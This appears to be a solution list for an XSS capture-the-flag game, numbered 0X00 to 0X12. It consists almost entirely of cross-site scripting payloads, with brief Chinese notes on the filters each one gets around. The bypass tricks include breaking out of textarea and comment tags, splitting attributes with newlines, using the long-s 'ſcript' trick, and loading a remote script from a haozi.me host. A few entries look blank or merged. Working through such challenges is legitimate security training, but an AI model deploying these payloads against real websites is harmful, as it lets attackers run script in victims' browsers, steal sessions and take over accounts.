0X00
<a href=javascript:alert(1)>text</a>
0X01
</textarea><script>alert(1)</script><textarea>
0X02
"onclick="alert(1)
0X03
正常输⼊发现()被过滤了
<script>alert`1`</script>
0X04
查看源码发现()和`都被过滤了
<svg><script>alert(1)</script>
0X05
--!><script>alert(1)</script>
0X06
查看源码,正则表达式过滤了以auto或on开头,=结尾的字符串或>
发现换⾏符没被过滤
type="image" src onerror
=alert(1)
0X07
<img src onerror='alert(1)'
0X08
0X09
http://www.segmentfault.com"></script><img src onerror="alert(1)"
0X0A
https://www.segmentfault.com.haozi.me/j.js
0X0B
<img src onerror=alert(1)>
0X0C
<img src onerror=alert(1)>
0X0D
alert(1);
-->
0x0E
<ſcript src=https://www.segmentfault.com.haozi.me/j.js></script>
0x0F
');alert('1
0X10
alert(1)
0X11
");alert("1
0X12
</script>
<script>alert(1)</script>